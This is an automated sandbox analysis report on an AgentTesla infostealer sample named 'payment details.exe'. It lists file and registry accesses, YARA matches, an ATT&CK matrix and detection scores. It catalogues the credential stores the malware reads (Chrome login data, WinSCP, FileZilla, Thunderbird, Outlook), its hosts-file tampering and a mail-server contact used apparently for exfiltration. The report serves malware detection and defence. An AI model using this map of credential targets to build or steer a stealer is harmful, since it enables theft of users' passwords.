                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Users\user\Desktop\payment details.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\payment details.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.916754002.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.916752082.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.690986558.0000000003C59000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.816268269.0000000003C09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.795750062.00000000037E9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.818572720.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.817039638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 816, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: payment details.exe PID: 7008, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6692, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6932, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 7132, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: payment details.exe PID: 1320, type: MEMORY
                      Source: Yara matchFile source: 0.2.payment details.exe.3e052e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.kprUEGC.exe.39952e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.payment details.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kprUEGC.exe.3db52e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.payment details.exe.3e052e8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.kprUEGC.exe.39952e8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kprUEGC.exe.3db52e8.2.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\payment details.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\payment details.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\payment details.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\payment details.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\Desktop\payment details.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.818572720.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.920699036.00000000029B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 816, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6932, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: payment details.exe PID: 1320, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.916754002.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.916752082.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.690986558.0000000003C59000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.816268269.0000000003C09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.795750062.00000000037E9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.818572720.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.817039638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 816, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: payment details.exe PID: 7008, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6692, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6932, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 7132, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: payment details.exe PID: 1320, type: MEMORY
                      Source: Yara matchFile source: 0.2.payment details.exe.3e052e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.kprUEGC.exe.39952e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.payment details.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kprUEGC.exe.3db52e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.payment details.exe.3e052e8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.kprUEGC.exe.39952e8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kprUEGC.exe.3db52e8.2.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection112File and Directory Permissions Modification1OS Credential Dumping2System Information Discovery114Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Disable or Modify Tools1Credentials in Registry1Query Registry1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery311SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsVirtualization/Sandbox Evasion131SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 383908 Sample: payment details.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 9 other signatures 2->49 6 payment details.exe 3 2->6         started        10 kprUEGC.exe 3 2->10         started        12 kprUEGC.exe 2 2->12         started        process3 file4 23 C:\Users\user\...\payment details.exe.log, ASCII 6->23 dropped 51 Injects a PE file into a foreign processes 6->51 14 payment details.exe 2 5 6->14         started        53 Multi AV Scanner detection for dropped file 10->53 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 10->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 10->57 19 kprUEGC.exe 2 10->19         started        21 kprUEGC.exe 2 12->21         started        signatures5 process6 dnsIp7 31 almasroor.com 69.65.3.206, 49764, 587 ASN-GIGENETUS United States 14->31 33 mail.almasroor.com 14->33 25 C:\Users\user\AppData\Roaming\...\kprUEGC.exe, PE32 14->25 dropped 27 C:\Users\user\...\kprUEGC.exe:Zone.Identifier, ASCII 14->27 dropped 35 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->35 37 Tries to steal Mail credentials (via file access) 14->37 39 Tries to harvest and steal ftp login credentials 14->39 41 3 other signatures 14->41 29 C:\Windows\System32\drivers\etc\hosts, ASCII 21->29 dropped file8 signatures9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      payment details.exe32%VirustotalBrowse
                      payment details.exe33%ReversingLabsWin32.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe33%ReversingLabsWin32.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.payment details.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      18.2.kprUEGC.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      19.2.kprUEGC.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      almasroor.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://bQxorv.com0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
